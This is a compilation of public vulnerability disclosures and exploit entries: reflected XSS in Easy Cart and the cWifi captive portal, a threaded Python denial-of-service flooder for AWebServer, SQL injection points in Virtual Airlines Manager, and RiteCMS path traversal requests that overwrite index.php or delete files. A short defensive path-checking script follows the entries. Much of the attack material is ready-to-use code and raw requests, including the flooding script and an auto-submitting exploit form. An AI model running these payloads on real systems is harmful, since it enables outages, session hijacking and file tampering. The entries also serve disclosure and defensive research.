<pre><code>Document Title:<br />===============<br />Easy Cart Shopping Cart - (Search) Non-Persistent Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2298<br /><br /><br />Release Date:<br />=============<br />2021-12-15<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2298<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.1<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Non Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />A mobile-friendly, SEO optimized and easy-to-install (with a free installation also offered on request) PHP shopping<br />cart script that can be used to add e-commerce functionality to existing sites or to create simple online stores.<br />Easy Cart is a PHP script for creating a simple shopping cart website or integrating shopping cart functionality<br />in an existing site; users are able to browse the products, add them to the cart, check out and make a payment.<br /><br />(Copy of the Homepage: https://www.netartmedia.net/easy-cart )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a cross site scripting web vulnerability in the Easy Cart Shopping Cart PHP Script.<br /><br /><br />Affected Product(s):<br />====================<br />NetArt Media<br />Product: Easy Cart Shopping Cart (v2021) - CMS (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-09-01: Researcher Notification & Coordination (Security Researcher)<br />2021-09-02: Vendor Notification (Security Department)<br
/>2021-**-**: Vendor Response/Feedback (Security Department)<br />2021-**-**: Vendor Fix/Patch (Service Developer Team)<br />2021-**-**: Security Acknowledgements (Security Department)<br />2021-12-15: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Pre Auth (No Privileges or Session)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A non-persistent (reflected) cross site scripting vulnerability has been discovered in the official Easy Cart Shopping Cart PHP script.<br />The vulnerability allows remote attackers to inject malicious script code via post method requests in order to compromise user<br />session data or to manipulate application content shown to clients.<br /><br />The cross site scripting web vulnerability is located in the `keyword_search` parameter of the `index` module's search function.<br />Remote attackers without privileged access are able to inject their own malicious script code through the search input field of<br />the index module post method request. 
The execution takes place in the results page of the search after the form is submitted via post.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent<br />external redirects to malicious sources and non-persistent manipulation of affected application modules.<br /><br />Request method(s):<br />[+] POST<br /><br />Vulnerable Input(s):<br />[+] Search (index)<br /><br />Vulnerable Parameter(s):<br />[+] keyword_search<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side reflected cross site scripting vulnerability can be exploited by remote attackers without a user account and with low<br />user interaction: the victim has to submit the attacker's prepared search request, for example via the auto-submitting form in the exploit below.<br />For security demonstration or to reproduce the cross site scripting vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Payload<br />>"<iframe src=evil.source onload=alert(document.cookie)><br /><br />The follow-up request for /cart/evil.source in the session log below is the injected iframe loading its src and confirms that the tag was rendered unencoded.<br /><br /><br />--- PoC Session Logs (POST) ---<br />https://easy-cart.localhost:8000/cart/index.php<br />Host: easy-cart.localhost:8000<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 228<br />Origin:https://easy-cart.localhost:8000<br />Connection: keep-alive<br />Referer:https://easy-cart.localhost:8000/cart/index.php<br />Cookie: PHPSESSID=24d238178bfb19f9bd93f25f1b465885<br />page=products&proceed_search=1&keyword_search=>"<iframe src=evil.source onload=alert(document.cookie)>&amount=$299 - $549&only_picture=0<br />-<br />POST: HTTP/2.0 200 OK<br />server: Apache<br />cache-control: no-store, no-cache, must-revalidate<br />pragma: no-cache<br />vary: Accept-Encoding<br />content-encoding: gzip<br />content-length: 2496<br />content-type: text/html; charset=UTF-8<br />-<br />https://easy-cart.localhost:8000/cart/evil.source<br />Host: easy-cart.localhost:8000<br />Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Connection: keep-alive<br />Referer:https://easy-cart.localhost:8000/cart/index.php<br />Cookie: PHPSESSID=24d238178bfb19f9bd93f25f1b465885<br />-<br />GET: HTTP/2.0 200 OK<br />server: Apache<br />vary: Accept-Encoding<br />content-encoding: gzip<br />content-length: 703<br />content-type: text/html; charset=UTF-8<br /><br /><br /><br />PoC: Exploit<br /><html><br /><head><br /><title>PoC</title><br /><style type="text/css"><br />#nodisplay {<br />display:none;<br />}<br /></style><br /></head><br /><body><br /><div id="nodisplay"><br /><form action="https://easy-cart.localhost:8000/cart/index.php" method="post"><br /><!-- hidden fields taken from the recorded search request above --><br /><input type="hidden" name="page" value="products"/><br /><input type="hidden" name="proceed_search" value="1"/><br /><input type="text" name="keyword_search" value="><iframe src=evil.source onload=alert(document.cookie)>"/><br /></form><br /></div><br /><script><br />function submitForm() {<br />document.forms[0].submit();<br />}<br />submitForm();<br /></script><br /></body><br /></html><br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask for permission.<br /><br /> Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS)<br /># Date: 28/12/2021<br /># Exploit Author: Andres Ramos [Invertebrado]<br /># Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm<br /># Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en<br /># Version: AWebServer GhostBuilding 18<br /># Tested on: Android<br /><br />#!/usr/bin/python3<br /><br /># *********************************************************************************<br /># * Author: Andres Ramos [Invertebrado]                                           *<br /># * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash   *<br /># *********************************************************************************<br /># Floods the target with GET requests for / and /mysqladmin from several threads<br /># until the web server stops responding. Stop with Ctrl+C.<br /><br />import os<br />import signal<br />import sys<br />import threading<br /><br />import requests<br />from pwn import *   # pwntools: provides the log.progress() status line<br /><br /># Colors<br />class colors():<br />    GREEN = "\033[0;32m\033[1m"<br />    END = "\033[0m"<br />    RED = "\033[0;31m\033[1m"<br />    BLUE = "\033[0;34m\033[1m"<br />    YELLOW = "\033[0;33m\033[1m"<br />    PURPLE = "\033[0;35m\033[1m"<br />    TURQUOISE = "\033[0;36m\033[1m"<br />    GRAY = "\033[0;37m\033[1m"<br /><br /># Set on Ctrl+C and polled by the workers (a plain global would need a<br /># 'global' declaration inside the handler to be visible to the threads)<br />stop_event = threading.Event()<br /><br />def def_handler(sig, frame):<br />    print(colors.RED + "\n[!] Exiting..." + colors.END)<br />    stop_event.set()<br />    os.system("tput cnorm")   # restore the cursor hidden by the progress bar<br />    os._exit(0)               # do not wait for workers blocked inside requests.get()<br /><br />signal.signal(signal.SIGINT, def_handler)<br /><br />if len(sys.argv) < 3:<br />    print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED + ">" + colors.END)<br />    sys.exit(1)<br /><br />url = sys.argv[1].rstrip("/")<br />Tr = sys.argv[2]<br /><br />def http():<br />    counter = 0<br />    p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END)<br />    while not stop_event.is_set():<br />        try:<br />            requests.get(url, timeout=5)<br />            requests.get(url + "/mysqladmin", timeout=5)<br />        except requests.RequestException:<br />            pass   # refused, reset or timed out: the target is already degrading, keep going<br />        counter += 2<br />        p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END)<br /><br />if __name__ == '__main__':<br /><br />    threads = []<br /><br />    try:<br />        for i in range(0, int(Tr)):<br />            t = threading.Thread(target=http, daemon=True)<br />            threads.append(t)<br /><br />        for x in threads:<br />            x.start()<br /><br />        for x in threads:<br />            x.join()<br /><br />    except Exception as e:<br />        log.failure(str(e))<br />        sys.exit(1)<br /><br /></code></pre>
<pre><code># Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection<br /># Google Dork: Powered by Virtual Airlines Manager [v2.6.2]<br /># Date: 2021-12-30<br /># Exploit Author: Milad Karimi<br /># Vendor Homepage: http://virtualairlinesmanager.net<br /># Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/<br /># Version: 2.6.2<br /># Tested on: Ubuntu 19.04<br /><br />[1] Vulnerable GET parameter: notam_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]<br /><br />[2] Vulnerable GET parameter: airport=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]<br /><br />[3] Vulnerable GET parameter: registry_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]<br /><br />[4] Vulnerable GET parameter: plane_location=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]<br /><br />[5] Vulnerable GET parameter: hub_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]<br /><br />[6] Vulnerable GET parameter: pilot_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]<br /><br />[7] Vulnerable GET parameter: event_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]<br /><br />[8] Vulnerable GET parameter: tour_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]<br /></code></pre>
<pre><code>Document Title:<br />===============<br />cWifi Hotspot Wireless CP - Code Execution Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2310<br /><br /><br />Release Date:<br />=============<br />2021-12-15<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2310<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />8.2<br /><br /><br />Vulnerability Class:<br />====================<br />Code Execution<br /><br /><br />Current Estimated Price:<br />========================<br />2.000€ - 3.000€<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a code execution vulnerability in the cWifi Hotspot Wireless Captive Portal.<br /><br /><br />Affected Product(s):<br />====================<br />Product: cWifi Hotspot Wireless Captive Portal - (PHP) (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-12-15: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />High<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />No User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />A code execution vulnerability has been discovered in the official cWifi Hotspot wireless captive portal web-application.<br />The vulnerability is located in the login status post method 
request of the spot.cwifi.de portal (/v2/status.php) and in the logout status page.<br />The ip, mac, server-address and host-ip values of the post method request are written back into the status and logout pages without sanitization.<br />Remote attackers are therefore able to inject their own malicious values into the post method data request and provoke client-side script code<br />execution (cross site scripting) in the browser of the portal user, in the context of that user's PHPSESSID. This allows the attacker to gain access<br />to the victim's wifi connection and session credentials. The issue can be exploited by a remote attacker after connecting to the wifi as guest or member.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] /v2/<br />[+] /logout<br /><br />Vulnerable File(s):<br />[+] status.php<br /><br />Vulnerable Parameter(s):<br />[+] ip<br />[+] mac<br />[+] server-address<br />[+] host-ip<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The code execution vulnerability can be exploited by remote attackers with guest access or with an authenticated user account.<br />For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Vulnerable Source: status.php (v2/status.php -http://spot.cwifi.de/status)<br /></head><br /><body><br /><div class="container-fluid"><br /><br><br> <br /><div class="row"><br /><div class="col-md-4"></div><br /><div class="col-md-4"><br /><form data-ajax="false" action='/v2/status.php?PHPSESSID=06u1m6qlhcp4tbuuapnq8du5c7' method="post"><br /><p><span class="zwischenh1gelb gelb bold">MAC-Adresse: <[MALICIOUS INJECTED CODE EXECUTION!]></span></span><br /></span><br /><span class="bold">IP Adresse:</span><[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]></p><br /><p><span class="bold">Bytes up/down:</span>7.2 MiB/ 221.6 MiB</p><br /><p><span class="bold">Session time:</span>7m56s</p><br /><p><br><br /><button 
name="ABMELDEN" type="submit" class="btn btn-primary btn-lg btn-block">abmelden</button><br /><button name="DELETE" type="submit" class="btn btn-danger btn-lg btn-block">abmelden und Daten löschen</button><br /></p><br /></form><br /><div class="col-md-4"></div><br /></div> </div> <br /></body><br /></html><br />-- logout status<br /><td valign="middle" align="center"><br /><b>you have just logged out</b> <br><br><br /><table class="tabula" border="1"><br /><tbody><tr><td align="right">user name</td><td><[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]></td></tr><br /><tr><td align="right">IP address</td><td><[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]></td></tr><br /><tr><td align="right">MAC address</td><td><[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]></td></tr><br /><tr><td align="right">session time</td><td>4m12s</td></tr><br /><tr><td align="right">time left</td><td>23h55m48s</td></tr><br /><tr><td align="right">bytes up/down:</td><td>49.1 KiB / 169.2 KiB</td></tr><br /></tbody></table><br /><br><br /><form action="http://spot.cwifi.de/login" name="login" onsubmit="return openLogin()"><br /><input type="submit" value="log in"><br /></form><br /></td><br /><br /><br />--- PoC Session Logs (POST) ---<br />POST /v2/status.php HTTP/1.1<br />Host: hotspot.cwifi.de<br />Content-Length: 1129<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin:http://spot.cwifi.de<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: cross-site<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: document<br />Referer:http://spot.cwifi.de/<br 
/>Accept-Encoding: gzip, deflate<br />Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br />-<br />hostname=spot.cwifi.de&identity=Client2822&login-by=http-pap&plain-passwd=yes&server-address=<[MALICIOUS INJECTED CODE!]>%3A80&ssl-login=no<br />&server-name=Client2822_HotSpot&link-login=http%3A%2F%2Fspot.cwifi.de%2Flogin&link-login-only=http%3A%2F%2Fspot.cwifi.de%2Flogin<br />&link-logout=http%3A%2F%2Fspot.cwifi.de%2Flogout&link-status=http%3A%2F%2Fspot.cwifi.de%2Fstatus&link-orig=<br />&domain=&interface-name=2_HotSpotA&ip=<[MALICIOUS INJECTED CODE!]>&logged-in=yes&mac=<[MALICIOUS INJECTED CODE!]>&trial=no&username=90%3ACC%3ADF%3A96%3AF6%3A59<br />&host-ip=<[MALICIOUS INJECTED CODE!]>&idle-timeout=5h&idle-timeout-secs=18000&limit-bytes-in=&limit-bytes-out=&refresh-timeout=1m&refresh-timeout-secs=60<br />&session-timeout=23h52m4s&session-timeout-secs=85924&session-time-left=23h52m4s&session-time-left-secs=85924&uptime=7m56s&uptime-secs=476<br />&bytes-in=7591511&bytes-in-nice=7.2+MiB&bytes-out=232391459&bytes-out-nice=221.6+MiB&packets-in=154484&packets-out=172963&remain-bytes-in=<br />&remain-bytes-out=&session-id=&var=&error=&error-orig=&chap-id=%24%28chap-id%29&chap-challenge=%24%28chap-challenge%29&popup=%24%28popup%29<br />&advert-pending=no&http-status=%24%28http-status%29&http-header=%24%28http-header%29<br />-<br />HTTP/1.1 200 OK<br />Server: Apache/2.4.18 (Ubuntu)<br />Set-Cookie: PHPSESSID=06u1m6qlhcp4tbuuapnq8du5c7; path=/<br />Cache-Control: no-store, no-cache, must-revalidate<br />Vary: Accept-Encoding<br />Content-Length: 2137<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />-- via Login<br />https://hotspot.cwifi.de/v2/login.php<br />Host: hotspot.cwifi.de<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br 
/>Content-Length: 1078<br />Origin:http://spot.cwifi.de<br />Connection: keep-alive<br />Referer:http://spot.cwifi.de/<br />Cookie: PHPSESSID=tvpvp06jktbs8hvgm8efh1eh33<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: cross-site<br />phone=&hostname=spot.cwifi.de&identity=Client2822&login-by=&plain-passwd=yes&server-address=<[MALICIOUS INJECTED CODE!]>:80&ssl-login=no&server-name=Client2822_HotSpot<br />&link-login=http://spot.cwifi.de/login&link-login-only=http://spot.cwifi.de/login&link-logout=http://spot.cwifi.de/logout&link-status=http://spot.cwifi.de/status<br />&link-orig=&domain=&interface-name=2_HotSpotA&ip=<[MALICIOUS INJECTED CODE!]>&logged-in=no&mac=<[MALICIOUS INJECTED CODE!]>&trial=no&username=<br />&host-ip=<[MALICIOUS INJECTED CODE!]>&idle-timeout=&idle-timeout-secs=0<br />&limit-bytes-in=&limit-bytes-out=&refresh-timeout=&refresh-timeout-secs=0&session-timeout=&session-timeout-secs=0&session-time-left=&session-time-left-secs=0<br />&uptime=0s&uptime-secs=0&bytes-in=0&bytes-in-nice=0 B&bytes-out=0&bytes-out-nice=0 B&packets-in=0&packets-out=0&remain-bytes-in=&remain-bytes-out=&session-id=<br />&var=&error=&error-orig=&chap-id=244&chap-challenge=2765623021030016220234114113331227527435520051<br />&popup=true&advert-pending=no&http-status=$(http-status)&http-header=$(http-header)<br />-<br />POST: HTTP/1.1 200 OK<br />Server: Apache/2.4.18 (Ubuntu)<br />Cache-Control: no-store, no-cache, must-revalidate<br />Vary: Accept-Encoding<br />Content-Encoding: gzip<br />Content-Length: 334<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Content-Type: text/html; charset=UTF-8<br /><br /><br />Security Risk:<br />==============<br />The security risk of the code execution web vulnerability, which can be attacked via multiple vectors to compromise the wifi session, is estimated as high.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab 
[admin@vulnerability-lab.com] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br /> Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)<br /># Date: 25/07/2021<br /># Exploit Author: faisalfs10x (https://github.com/faisalfs10x)<br /># Vendor Homepage: https://ritecms.com/<br /># Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip<br /># Version: <= 3.1.0<br /># Google Dork: intext:"Powered by RiteCMS"<br /># Tested on: Windows 10, Ubuntu 18, XAMPP<br /># Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b<br /><br /><br />################<br /># Description #<br />################<br /><br /># RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in the Admin Panel. The "file_name" parameter of the file manager upload request is used as the destination file name without path validation, so "../" sequences leave the upload directory. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has permission to write). Furthermore, an attacker might leverage the arbitrary file overwrite to modify existing files such as /etc/passwd or /etc/shadow if the PHP process runs as root.<br /><br /><br />############################################################<br /># PoC to overwrite existing index.php to display phpinfo() #<br />############################################################<br /><br /><br />Steps to Reproduce:<br /><br />1. Login as admin<br />2. Go to File Manager<br />3. Click Upload file > Browse..<br />4. Upload any file and tick the checkbox "overwrite file with same name"<br />5. 
Intercept the request and replace the current file name with the path of any file on the server via the "file_name" parameter.<br /><br /><br />PoC: parameter file_name - to overwrite index.php in the web root (one level above the media directory) so that it displays phpinfo(), the payload is "../index.php"<br /> multipart part "file" (filename anyfile.txt) - carries the new file content "<?php phpinfo(); ?>"<br /><br />Request:<br />========<br /><br />POST /ritecmsv3.1.0/admin.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298<br />Content-Length: 1840<br />Origin: http://localhost<br />DNT: 1<br />Connection: close<br />Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media<br />Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre<br />Upgrade-Insecure-Requests: 1<br />Sec-GPC: 1<br /><br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="mode"<br /><br />filemanager<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="file"; filename="anyfile.txt"<br />Content-Type: application/octet-stream<br /><br />content of the file to overwrite here<br />-- this is example to overwrite index.php to display phpinfo --<br /><?php phpinfo(); ?><br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="directory"<br /><br />media<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="file_name"<br /><br />../index.php<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="overwrite_file"<br /><br />true<br
/>-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="upload_mode"<br /><br />1<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="resize_xy"<br /><br />x<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="resize"<br /><br />640<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="compression"<br /><br />80<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="thumbnail_resize_xy"<br /><br />x<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="thumbnail_resize"<br /><br />150<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="thumbnail_compression"<br /><br />70<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="upload_file_submit"<br /><br />OK - Upload file<br />-----------------------------351719865731412638493510448298--<br /></code></pre>
<pre><code># Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)<br /># Date: 25/07/2021<br /># Exploit Author: faisalfs10x (https://github.com/faisalfs10x)<br /># Vendor Homepage: https://ritecms.com/<br /># Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip<br /># Version: <= 3.1.0<br /># Google Dork: intext:"Powered by RiteCMS"<br /># Tested on: Windows 10, Ubuntu 18, XAMPP<br /># Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd<br /><br /><br />################<br /># Description #<br />################<br /><br /># RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in the Admin Panel. The "delete" parameter of the file manager is used as a file name without path validation, so "../" sequences leave the selected directory. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has permission to delete). Furthermore, an attacker might leverage the arbitrary file deletion to circumvent webserver security mechanisms, for example by deleting the .htaccess file, which removes the restrictions it enforced.<br /><br /><br />#####################################################<br /># PoC to delete secretConfig.conf file in web root #<br />#####################################################<br /><br /><br />Steps to Reproduce:<br /><br />1. Login as admin<br />2. Go to File Manager<br />3. Delete any file<br />4. 
Intercept the request and replace the current file name with the path of any file on the server via the "delete" parameter.<br /><br /># Assuming there is a secretConfig.conf file in the web root<br /><br />PoC: parameter delete - to delete secretConfig.conf in the web root (one level above the media directory), the payload is "../secretConfig.conf"<br /><br />Request:<br />========<br /><br />GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager<br />Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Sec-GPC: 1<br /><br /></code></pre>
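The two RiteCMS advisories above share one root cause: the "directory", "file_name" and "delete" request parameters reach the filesystem without being confined to the file manager's directory, so "../index.php" and "../secretConfig.conf" land in the web root. The following Python is an added example, not RiteCMS code, of the containment check that closes both the overwrite and the deletion issue. The web root /srv/cms and the "media" directory used in the usage section are assumptions for illustration; the check itself does not depend on them.

```python
import os
import posixpath

# Added example, not RiteCMS code. The web root and directory names used below
# are assumptions; the containment check is independent of them.


class PathTraversal(ValueError):
    """A request-supplied name would leave the directory it must stay in."""


def resolve_in_dir(base_dir, user_name):
    """Return the absolute path of user_name inside base_dir, or raise.

    Rejects empty names, NUL bytes (which truncate C string paths), absolute
    paths and any '.', '..' or empty segment, then canonicalises both sides
    with realpath so that a symlink inside base_dir cannot point outside it,
    and checks containment with commonpath rather than a string prefix test
    (a prefix test would accept 'media_old' as being inside 'media').
    """
    if not user_name or "\x00" in user_name:
        raise PathTraversal("empty name or NUL byte")
    # RiteCMS also runs on Windows/XAMPP, where '\' is a separator as well.
    normalized = user_name.replace("\\", "/")
    if posixpath.isabs(normalized):
        raise PathTraversal("absolute path not allowed: %r" % user_name)
    parts = normalized.split("/")
    if any(p in ("", ".", "..") for p in parts):
        raise PathTraversal("dot or empty segment in %r" % user_name)
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, *parts))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows
        inside = False
    if not inside:
        raise PathTraversal("%r resolves to %s, outside %s" % (user_name, candidate, base))
    return candidate


def file_manager_target(webroot, directory, name):
    """Target of admin.php?mode=filemanager&directory=...&file_name=... (upload)
    or ...&delete=... (deletion). Both values come from the request, so the
    directory is confined to the web root and the name to that directory."""
    return resolve_in_dir(resolve_in_dir(webroot, directory), name)


def is_allowed(webroot, directory, name):
    """Boolean form of file_manager_target for callers that only need a verdict."""
    try:
        file_manager_target(webroot, directory, name)
        return True
    except PathTraversal:
        return False


if __name__ == "__main__":
    # The two payloads from the advisories, a benign name and an absolute path.
    for name in ("logo.png", "../index.php", "../secretConfig.conf", "/etc/passwd"):
        verdict = "allowed" if is_allowed("/srv/cms", "media", name) else "REJECTED"
        print("%-22s -> %s" % (name, verdict))
```

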